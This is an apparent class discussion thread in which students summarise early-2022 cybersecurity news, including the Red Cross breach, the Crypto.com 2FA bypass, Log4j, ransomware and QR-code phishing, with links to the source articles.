Red Cross suffers cyber-attack – data of 515,000 ‘highly vulnerable’ people exposed.
The International Committee of the Red Cross (ICRC) has revealed a data breach exposing information belonging to over half a million “highly vulnerable” people.
The ‘sophisticated’ attack was detected last week. In total, over 515,000 individuals are believed to have been impacted with many classed as “highly vulnerable” – including those separated from their families due to conflict and disasters, others classified as missing people, and individuals being held in detention centers.
Cyber attacks continue to increase and there is a pressing need to educate businesses and consumers about how to protect themselves. Most people do not understand the implications of a severe cyber attack and often associate cyber threats with identity theft and fraud instead of larger attacks on infrastructure.
Cybersecurity training is often infrequent and fails to explain the severity of the present threat landscape. Consumers are typically only exposed to security training through their employers during annual sessions. Beyond this exposure, most people don’t pay much attention to cybersecurity during the year. In order to address this, companies need to create a culture of security awareness and find opportunities throughout the year that relate to the day to day activities of their employees. These efforts should focus on helping people to understand the severity of the current threat landscape and how attacks can affect much more than people’s identity and financial well being. This increased awareness will be critical as new technologies, such as IoT, gain traction and increase risk.
2FA Bypassed in $34.6M Crypto.com Heist: What We Can Learn
Crypto.com acknowledged that it had lost $34.65 million worth of cash, Bitcoin and Ethereum after getting ransacked in an attack that slipped fat transactions past two-factor authentication (2FA).
Crypto.com has acknowledged that yes, the total amount of the loss is well over $300 million – far more than was initially estimated – but that all customers had been reimbursed. The company also said that the robbers pulled it off by blowing past the exchange’s 2FA system.
Crypto.com immediately suspended withdrawals on the platform as it investigated. The exchange fully restored the affected accounts, revoked all 2FA tokens and added additional security hardening measures, requiring all customers to re-login and set up their 2FA token.
Finally, Crypto.com is introducing the Worldwide Account Protection Program (WAPP) to offer additional protection and security for user funds held in the Crypto.com app and the Crypto.com Exchange. Designed to protect user funds against unauthorized withdrawals, WAPP restores funds up to USD $250,000 for qualified users.
FIN8 Hackers Spotted Using New ‘White Rabbit’ Ransomware in Recent Attacks (thehackernews.com)
According to the article, a new ransomware family called white rabbit appeared in the world recently, and FIN8 is a financially motivated actor who has been spotted targeting financial organization for several years.
The deadline for the victim to pay a ransom is set to four days, after which the actors threaten to send the stolen data to data protection authorities, leading to data breach GDPR penalties.
The Ukranian government faced a cyber attack in which many of their government websites displayed a large warning statement including the words “All information about you has become public, be afraid and wait for the worst”. The message continued on in a way that insinuated that it had been written by Ukraine’s neighboring country, Poland. Ukraine officials believe that the attack may have actually come from Russia in an attempt to spark controversy between Ukraine and Poland. It appears that no personal data was actually breached. This ties into one of the points made in the reading this week: Not all risks/incidences fall into line with the classic risk management equations. The websites have been restored and data is safe but tensions in Ukraine have been heightened.
With public Wi-Fi becoming more and more standard in today’s society, providing public Wi-Fi is a premium service for your customers. According to recent statistics, there are about 410,000 public Wi-Fi hotspots in the United States alone, located in public places such as parks, libraries, public transportation, train stations, etc. Public Wi-Fi has become an integral part of modern life.
While public Wi-Fi has to offer many benefits, when users use public Wi-Fi, it means that users may be vulnerable to many cyber threats, such as malware, viruses, hacking, and other forms of intrusion. It also provides opportunities for cybercriminals to commit virtual crimes and harm internet users. However, having a solid DNS filtering service can stop cyber threats like malware, ransomware, phishing, and botnets before they reach network devices. Also, DNS can filter out unwanted content such as pornographic material, violence, and drug-related content.
Myanmar’s military junta seeks ban on VPNs and digital currency
A bill signed by Soe Thein, Myanmar’s permanent secretary of the military’s transport and communications ministry, intends to criminalize the use of virtual private networks and transacting via crypto. It also demands Internet service providers to share critizen internet records upon request by authorities. Citizens who fail to abide by these new laws could face different penalties, ranging from prison terms of up to one year for crypto trading and up to 3 years for VPN use and fines of up to $2,800. This bill comes after a social media ban that took place in February of 2021 in an effort to digitally censor residents from the outside world.
Twitter’s top security staff out after incoming CEO shakes things up
In a surprise shakeup, Twitter’s CISO and head of security have been ousted from the company. It does not appear that this move was voluntary for both of these individuals. Many are speculating that this may be current CEO Parag Agrawal’s way of establishing his own stamp on the company after former CEO Jack Dorsey stepped down a few months ago. This move so far has been criticized in the Infosec community as both of these individuals are highly respected and regarded as some of the top security people in field. It is not certain who will take over in these roles at this time.
“Hackers Infect macOS with New DazzleSpy Backdoor in Watering-Hole Attacks”
A previously undocumented cyber-espionage malware aimed at Apple’s macOS operating system leveraged a Safari web browser exploit as part of a watering hole attack targeting politically active, pro-democracy individuals in Hong Kong.
Slovak cybersecurity firm ESET attributed the intrusion to an actor with “strong technical capabilities,” calling out the campaign’s overlaps to that of a similar digital offensive disclosed by Google Threat Analysis Group (TAG) in November 2021.
The Department of Homeland Security is expecting Russia to launch a cyber attack against the United States due to Washington’s support of the Ukraine. In recent weeks, tensions have been running high due to a standoff between Russia and Ukraine at the Ukrainian border. A lot of people are wondering if Russia is preparing to invade them. DHS warns that Russia has a range of offensive cyber tools which they could employ against U.S. networks, and this in turn could potentially effect operations of planes, hospitals, dams, and even bridges.
Russia-based cybercriminals are said to be responsible for two recent significant security breaches; a ransomware attack that caused the operators of the massive Colonial Pipeline to shut down in May 2021, and another ransomware attack of the meat processing company JBS. Some new potential targets could be wastewater treatment, agriculture, and or transportation just to name a few. “Officials warn that efforts to stop such cyberattacks on U.S. targets are virtually impossible, given their sophistication”. (Josh Meyer)
If Russia were to launch a cyberattack against these U.S targets, it is likely that Washington will retaliate. “And that could trigger a potentially dangerous escalation that could threaten to draw the United States directly into the conflict between Russia and its neighbor Ukraine.” (Josh Meyer)
https://www.sciencedirect.com/science/article/pii/S0963868722000038
“Strategic roles of IT modernization and cloud migration in reducing cybersecurity risks of organizations: The case of U.S federal government”
This article is interested in security and cloud. This article changed my thought that using cloud service would increase cyber threat. Based on datasets from US federal agencies, the article points that migration of the legacy systems to the cloud will decrease number of security incidents. Moreover, “a 1%-point increase in the proportion of IT budgets spent on IT modernization is associated with a 5.6% decrease in the number of security incidents.”
Great points! It can be stressful trusting your systems to a cloud provider and precautions like legal agreements should always be put in place but in some cases, cloud providers can be the most secure option. I believe this is especially true for smaller businesses that may be more susceptible to falling behind on updates to software and equipment.
The BBC article, “The battle over end-to-end encryption, is news to understand recent push by the UK and other agencies against Facebook Messenger. While I was reading this article, it also came to my attention that, WhatsApp, iMessage, or Signal protects user data with end-to-end encryption. However, the fact Facebook has not introduced this control for its messenger application becomes treat for young users to be victims of online predators.
In today’s digital world, I believe it’s important that our chatting apps protect our data with encryption methods where it scrambles data and makes it unreadable. Certain websites also use encryption connections between you and the website. The padlock sign on the browser represents the encryption and something you might need to check while browsing on the web. Especially, for confidential communication or banking websites, it’s even more crucial to make sure criminals cannot read your data while it travels over the internet.
Also, a good highlight comes from US National Center for Missing and Exploited Children, where they announced 21.7 million reports were made in the US in 2020 about child sexual abuse material being exchanged on social media.
Merck Awarded $1.4B Insurance Payout over NotPetya Attack
Pharmaceutical company, Merck, was awarded a $1.4 billion payout last month on its property insurance policy, for losses the company suffered because of the 2017 NotPetya cyberattacks. Merck’s cyber-insurance company, International Indemnity, was claiming the losses fell under the “War of Hostile Acts” exclusion, which is a common clause in insurance policies which excludes damage arising from a warlike act between sovereign or quasi-sovereign entities. The Superior Court of New Jersey ruled that the exclusion was “inapplicable”, and so Merck’s $1.75 billion property insurance policy will have to cover the damage the NotPetya attacks did to the company’s 40,000 computers.
This article touches on which organizations must comply with the Federal Information Security Management Act (FISMA). The article writes, “Any US organization directly related to or doing business with the US government, including federal- and state-level government agencies and contractors, state government departments, military subcontractors and even data clearinghouses fall under FISMA regulations”. The article notes that National Institute of Standards and Technology (NIST) has outlined key steps to be FISMA complaint, which include:
1.) Track and categorize all information and media devices that must be protected;
2.) Set baseline security controls. Implement and document their use in the appropriate security system;
3.) Regularly refine these controls using a defined risk-assessment procedure as part of an annual review process; and
4.) Authorize the IT system for processing within the selected group of authorized personnel and monitor the systems regularly.
The article also states that organizations must adhere to data destruction requirements in order to achieve full compliance. FISMA requires organizations must:
1.) Set and enforce policies for protecting all data and information systems, whether on paper or in digital format;
2.) Appoint authorized personnel for sole access of the IT systems and federal information; and
3.) Ensure complete and total destruction of both the data and the media in which it is stored upon reaching end-of-life.
“School District reports a 334% hike in cybersecurity insurance costs”
A school district in Chicago released details on its cyber-insurance, from $6,661 in 2021 to $22,229 in 2022. This massive spike is due to an increasing number of threats, their severity, & potential for costly disruptions. A key factor leading to these cost increases is due to ransomware and also encrypting attacks. The theft of data can significantly compromise school networks, employees, & students. Ransomware attackers target these small school districts because they are rarely well-protected enough to deal with them, and because they typically have active insurance polices, they are attractive targets. For this school district in particular, the insurer is requiring a district-wide implementation of MFA. The attackers typically use compromised user credentials to target systems, so MFA, for the most part, is enough to stop attacks before they can even start. This also prevents attacker’s from being able to tweak with backups. District 87, the district discussed in the article, is one of many that will have to deal with this burden on its annual budget, and that also stretches to apply to organizations such as hospitals, non-profits, & local governments. Attackers see these targets as “soft”, and in order to reduce these new insurance premiums, it begins with increased user awareness
The International Committee of the Red Cross (ICRC) has revealed a major data breach that compromised the personal details of over 515,000 “highly vulnerable” victims.
It was stolen from a Swiss contractor that stores the data on behalf of the global humanitarian organization headquartered in Geneva.
The ICRC claimed it originated from at least 60 Red Cross and Red Crescent National Societies worldwide
If you are currently working at an organization, you probably heard about the recent Log4J exploit over the holidays. Which, nonetheless, was not a fun time for anyone that has to identify, and patch affected software packages. Essentially how it works is anyone with an LDAP server can force the logging tool to log an object and effectively execute anything they want on the target. Here is a video that explains how easy it is to do: https://www.youtube.com/watch?v=0-abhd-CLwQ&t=1s
As you can see it’s 17 lines of code. But what’s even more scary is that how common log4j is across platforms and packages. And if you do have a computer that can be exploited you can literally attack it in any shape or form. From exfiltration of data, to bottling the computer or turning it into a botnet. And that is what amazes me – is that how easy this is to exploit and how much damages it will cost businesses over the long run.
Something in our readings that is discussed is that being an attacker is easier. We have to know every precaution and security measure necessary – and even still there could be a threat looming unnoticed.
In this article it explains how threat actors have found a new tactic to redirect users to malicious websites through the use of QR codes. This method has become very useful as nowadays it is more common to use a QR code when walking into a restaurant for the menu, or scanning the QR code to fill up the parking meter. However, users have been misled and been giving away there financial information without even knowing it. I found this method being very effective as it is hidden in plain sight but once the interface can be noticed as an unsafe/unsecure then it can be avoided. Very clever and deceptive, especially when using it to fill up a parking meter, I guess that’s why they made an application for city parking now.
Oluwaseun Soyomokun says
Red Cross suffers cyber-attack – data of 515,000 ‘highly vulnerable’ people exposed.
The International Committee of the Red Cross (ICRC) has revealed a data breach exposing information belonging to over half a million “highly vulnerable” people.
The ‘sophisticated’ attack was detected last week. In total, over 515,000 individuals are believed to have been impacted with many classed as “highly vulnerable” – including those separated from their families due to conflict and disasters, others classified as missing people, and individuals being held in detention centers.
https://portswigger.net/daily-swig/red-cross-suffers-cyber-attack-data-of-515-000-highly-vulnerable-people-exposed
Matthew Bryan says
Article: Cybersecurity training isn’t working. And hacking attacks are only getting worse
Author: Danny Palmer
Published: 06 Jan 2022
Link: https://www.zdnet.com/article/your-cybersecurity-training-needs-improvement-because-hacking-attacks-are-only-getting-worse/
Cyber attacks continue to increase and there is a pressing need to educate businesses and consumers about how to protect themselves. Most people do not understand the implications of a severe cyber attack and often associate cyber threats with identity theft and fraud instead of larger attacks on infrastructure.
Cybersecurity training is often infrequent and fails to explain the severity of the present threat landscape. Consumers are typically only exposed to security training through their employers during annual sessions. Beyond this exposure, most people don’t pay much attention to cybersecurity during the year. In order to address this, companies need to create a culture of security awareness and find opportunities throughout the year that relate to the day to day activities of their employees. These efforts should focus on helping people to understand the severity of the current threat landscape and how attacks can affect much more than people’s identity and financial well being. This increased awareness will be critical as new technologies, such as IoT, gain traction and increase risk.
Shubham Patil says
2FA Bypassed in $34.6M Crypto.com Heist: What We Can Learn
Crypto.com acknowledged that it had lost $34.65 million worth of cash, Bitcoin and Ethereum after getting ransacked in an attack that slipped fat transactions past two-factor authentication (2FA).
Crypto.com has acknowledged that yes, the total amount of the loss is well over $300 million – far more than was initially estimated – but that all customers had been reimbursed. The company also said that the robbers pulled it off by blowing past the exchange’s 2FA system.
Crypto.com immediately suspended withdrawals on the platform as it investigated. The exchange fully restored the affected accounts, revoked all 2FA tokens and added additional security hardening measures, requiring all customers to re-login and set up their 2FA token.
Finally, Crypto.com is introducing the Worldwide Account Protection Program (WAPP) to offer additional protection and security for user funds held in the Crypto.com app and the Crypto.com Exchange. Designed to protect user funds against unauthorized withdrawals, WAPP restores funds up to USD $250,000 for qualified users.
Link: https://threatpost.com/2fa-bypassed-crypto-com-heist/177846/
Mohammed Syed says
FIN8 Hackers Spotted Using New ‘White Rabbit’ Ransomware in Recent Attacks (thehackernews.com)
According to the article, a new ransomware family called white rabbit appeared in the world recently, and FIN8 is a financially motivated actor who has been spotted targeting financial organization for several years.
The deadline for the victim to pay a ransom is set to four days, after which the actors threaten to send the stolen data to data protection authorities, leading to data breach GDPR penalties.
Amelia Safirstein says
The Ukranian government faced a cyber attack in which many of their government websites displayed a large warning statement including the words “All information about you has become public, be afraid and wait for the worst”. The message continued on in a way that insinuated that it had been written by Ukraine’s neighboring country, Poland. Ukraine officials believe that the attack may have actually come from Russia in an attempt to spark controversy between Ukraine and Poland. It appears that no personal data was actually breached. This ties into one of the points made in the reading this week: Not all risks/incidences fall into line with the classic risk management equations. The websites have been restored and data is safe but tensions in Ukraine have been heightened.
https://www.cnn.com/2022/01/14/europe/ukraine-cyber-attack-government-intl/index.html
Yangyuan Lin says
Don’t Use Public Wi-Fi Without DNS Filtering
With public Wi-Fi becoming more and more standard in today’s society, providing public Wi-Fi is a premium service for your customers. According to recent statistics, there are about 410,000 public Wi-Fi hotspots in the United States alone, located in public places such as parks, libraries, public transportation, train stations, etc. Public Wi-Fi has become an integral part of modern life.
While public Wi-Fi has to offer many benefits, when users use public Wi-Fi, it means that users may be vulnerable to many cyber threats, such as malware, viruses, hacking, and other forms of intrusion. It also provides opportunities for cybercriminals to commit virtual crimes and harm internet users. However, having a solid DNS filtering service can stop cyber threats like malware, ransomware, phishing, and botnets before they reach network devices. Also, DNS can filter out unwanted content such as pornographic material, violence, and drug-related content.
Link: https://thehackernews.com/2022/01/dont-use-public-wi-fi-without-dns.html
Elizabeth Gutierrez says
Myanmar’s military junta seeks ban on VPNs and digital currency
A bill signed by Soe Thein, Myanmar’s permanent secretary of the military’s transport and communications ministry, intends to criminalize the use of virtual private networks and transacting via crypto. It also demands Internet service providers to share critizen internet records upon request by authorities. Citizens who fail to abide by these new laws could face different penalties, ranging from prison terms of up to one year for crypto trading and up to 3 years for VPN use and fines of up to $2,800. This bill comes after a social media ban that took place in February of 2021 in an effort to digitally censor residents from the outside world.
Link: https://www.theregister.com/2022/01/24/myanmar_military_junta_bans_vpns_crypto/
Ryan Trapp says
Twitter’s top security staff out after incoming CEO shakes things up
In a surprise shakeup, Twitter’s CISO and head of security have been ousted from the company. It does not appear that this move was voluntary for both of these individuals. Many are speculating that this may be current CEO Parag Agrawal’s way of establishing his own stamp on the company after former CEO Jack Dorsey stepped down a few months ago. This move so far has been criticized in the Infosec community as both of these individuals are highly respected and regarded as some of the top security people in field. It is not certain who will take over in these roles at this time.
https://www.theregister.com/2022/01/25/in_brief_security/
Jason Burwell says
“Hackers Infect macOS with New DazzleSpy Backdoor in Watering-Hole Attacks”
A previously undocumented cyber-espionage malware aimed at Apple’s macOS operating system leveraged a Safari web browser exploit as part of a watering hole attack targeting politically active, pro-democracy individuals in Hong Kong.
Slovak cybersecurity firm ESET attributed the intrusion to an actor with “strong technical capabilities,” calling out the campaign’s overlaps to that of a similar digital offensive disclosed by Google Threat Analysis Group (TAG) in November 2021.
https://thehackernews.com/2022/01/hackers-infect-macos-with-new-dazzlespy.html?&web_view=true
Joshua Moses says
The Department of Homeland Security is expecting Russia to launch a cyber attack against the United States due to Washington’s support of the Ukraine. In recent weeks, tensions have been running high due to a standoff between Russia and Ukraine at the Ukrainian border. A lot of people are wondering if Russia is preparing to invade them. DHS warns that Russia has a range of offensive cyber tools which they could employ against U.S. networks, and this in turn could potentially effect operations of planes, hospitals, dams, and even bridges.
Russia-based cybercriminals are said to be responsible for two recent significant security breaches; a ransomware attack that caused the operators of the massive Colonial Pipeline to shut down in May 2021, and another ransomware attack of the meat processing company JBS. Some new potential targets could be wastewater treatment, agriculture, and or transportation just to name a few. “Officials warn that efforts to stop such cyberattacks on U.S. targets are virtually impossible, given their sophistication”. (Josh Meyer)
If Russia were to launch a cyberattack against these U.S targets, it is likely that Washington will retaliate. “And that could trigger a potentially dangerous escalation that could threaten to draw the United States directly into the conflict between Russia and its neighbor Ukraine.” (Josh Meyer)
https://news.yahoo.com/homeland-security-warns-russia-could-230721297.html?fr=sycsrp_catchall
Hang Nu Song Nguyen says
https://www.sciencedirect.com/science/article/pii/S0963868722000038
“Strategic roles of IT modernization and cloud migration in reducing cybersecurity risks of organizations: The case of U.S federal government”
This article is interested in security and cloud. This article changed my thought that using cloud service would increase cyber threat. Based on datasets from US federal agencies, the article points that migration of the legacy systems to the cloud will decrease number of security incidents. Moreover, “a 1%-point increase in the proportion of IT budgets spent on IT modernization is associated with a 5.6% decrease in the number of security incidents.”
Amelia Safirstein says
Hi Hang,
Great points! It can be stressful trusting your systems to a cloud provider and precautions like legal agreements should always be put in place but in some cases, cloud providers can be the most secure option. I believe this is especially true for smaller businesses that may be more susceptible to falling behind on updates to software and equipment.
Miray Bolukbasi says
The BBC article, “The battle over end-to-end encryption, is news to understand recent push by the UK and other agencies against Facebook Messenger. While I was reading this article, it also came to my attention that, WhatsApp, iMessage, or Signal protects user data with end-to-end encryption. However, the fact Facebook has not introduced this control for its messenger application becomes treat for young users to be victims of online predators.
In today’s digital world, I believe it’s important that our chatting apps protect our data with encryption methods where it scrambles data and makes it unreadable. Certain websites also use encryption connections between you and the website. The padlock sign on the browser represents the encryption and something you might need to check while browsing on the web. Especially, for confidential communication or banking websites, it’s even more crucial to make sure criminals cannot read your data while it travels over the internet.
Also, a good highlight comes from US National Center for Missing and Exploited Children, where they announced 21.7 million reports were made in the US in 2020 about child sexual abuse material being exchanged on social media.
https://www.bbc.com/news/technology-60055270
Michael Galdo says
Merck Awarded $1.4B Insurance Payout over NotPetya Attack
Pharmaceutical company, Merck, was awarded a $1.4 billion payout last month on its property insurance policy, for losses the company suffered because of the 2017 NotPetya cyberattacks. Merck’s cyber-insurance company, International Indemnity, was claiming the losses fell under the “War of Hostile Acts” exclusion, which is a common clause in insurance policies which excludes damage arising from a warlike act between sovereign or quasi-sovereign entities. The Superior Court of New Jersey ruled that the exclusion was “inapplicable”, and so Merck’s $1.75 billion property insurance policy will have to cover the damage the NotPetya attacks did to the company’s 40,000 computers.
https://threatpost.com/merck-insurance-payout-notpetya-attack/177872/
Bryan Garrahan says
https://www.infosecurity-magazine.com/blogs/fisma-requirements-are-you/
This article touches on which organizations must comply with the Federal Information Security Management Act (FISMA). The article writes, “Any US organization directly related to or doing business with the US government, including federal- and state-level government agencies and contractors, state government departments, military subcontractors and even data clearinghouses fall under FISMA regulations”. The article notes that National Institute of Standards and Technology (NIST) has outlined key steps to be FISMA complaint, which include:
1.) Track and categorize all information and media devices that must be protected;
2.) Set baseline security controls. Implement and document their use in the appropriate security system;
3.) Regularly refine these controls using a defined risk-assessment procedure as part of an annual review process; and
4.) Authorize the IT system for processing within the selected group of authorized personnel and monitor the systems regularly.
The article also states that organizations must adhere to data destruction requirements in order to achieve full compliance. FISMA requires organizations must:
1.) Set and enforce policies for protecting all data and information systems, whether on paper or in digital format;
2.) Appoint authorized personnel for sole access of the IT systems and federal information; and
3.) Ensure complete and total destruction of both the data and the media in which it is stored upon reaching end-of-life.
Alexander William Knoll says
“School District reports a 334% hike in cybersecurity insurance costs”
A school district in Chicago released details on its cyber-insurance, from $6,661 in 2021 to $22,229 in 2022. This massive spike is due to an increasing number of threats, their severity, & potential for costly disruptions. A key factor leading to these cost increases is due to ransomware and also encrypting attacks. The theft of data can significantly compromise school networks, employees, & students. Ransomware attackers target these small school districts because they are rarely well-protected enough to deal with them, and because they typically have active insurance polices, they are attractive targets. For this school district in particular, the insurer is requiring a district-wide implementation of MFA. The attackers typically use compromised user credentials to target systems, so MFA, for the most part, is enough to stop attacks before they can even start. This also prevents attacker’s from being able to tweak with backups. District 87, the district discussed in the article, is one of many that will have to deal with this burden on its annual budget, and that also stretches to apply to organizations such as hospitals, non-profits, & local governments. Attackers see these targets as “soft”, and in order to reduce these new insurance premiums, it begins with increased user awareness
https://www.bleepingcomputer.com/news/security/school-district-reports-a-334-percent-hike-in-cybersecurity-insurance-costs/
Ornella Rhyne says
The International Committee of the Red Cross (ICRC) has revealed a major data breach that compromised the personal details of over 515,000 “highly vulnerable” victims.
It was stolen from a Swiss contractor that stores the data on behalf of the global humanitarian organization headquartered in Geneva.
The ICRC claimed it originated from at least 60 Red Cross and Red Crescent National Societies worldwide
https://www.infosecurity-magazine.com/news/red-cross-supply-chain-data-breach/
Michael Duffy says
If you are currently working at an organization, you probably heard about the recent Log4J exploit over the holidays. Which, nonetheless, was not a fun time for anyone that has to identify, and patch affected software packages. Essentially how it works is anyone with an LDAP server can force the logging tool to log an object and effectively execute anything they want on the target. Here is a video that explains how easy it is to do: https://www.youtube.com/watch?v=0-abhd-CLwQ&t=1s
As you can see it’s 17 lines of code. But what’s even more scary is that how common log4j is across platforms and packages. And if you do have a computer that can be exploited you can literally attack it in any shape or form. From exfiltration of data, to bottling the computer or turning it into a botnet. And that is what amazes me – is that how easy this is to exploit and how much damages it will cost businesses over the long run.
Something in our readings that is discussed is that being an attacker is easier. We have to know every precaution and security measure necessary – and even still there could be a threat looming unnoticed.
https://theconversation.com/what-is-log4j-a-cybersecurity-expert-explains-the-latest-internet-vulnerability-how-bad-it-is-and-whats-at-stake-173896
Wilmer Monsalve says
https://cyware.com/news/threat-actors-use-malicious-qr-codes-warns-fbi-e553b353
In this article it explains how threat actors have found a new tactic to redirect users to malicious websites through the use of QR codes. This method has become very useful as nowadays it is more common to use a QR code when walking into a restaurant for the menu, or scanning the QR code to fill up the parking meter. However, users have been misled and been giving away there financial information without even knowing it. I found this method being very effective as it is hidden in plain sight but once the interface can be noticed as an unsafe/unsecure then it can be avoided. Very clever and deceptive, especially when using it to fill up a parking meter, I guess that’s why they made an application for city parking now.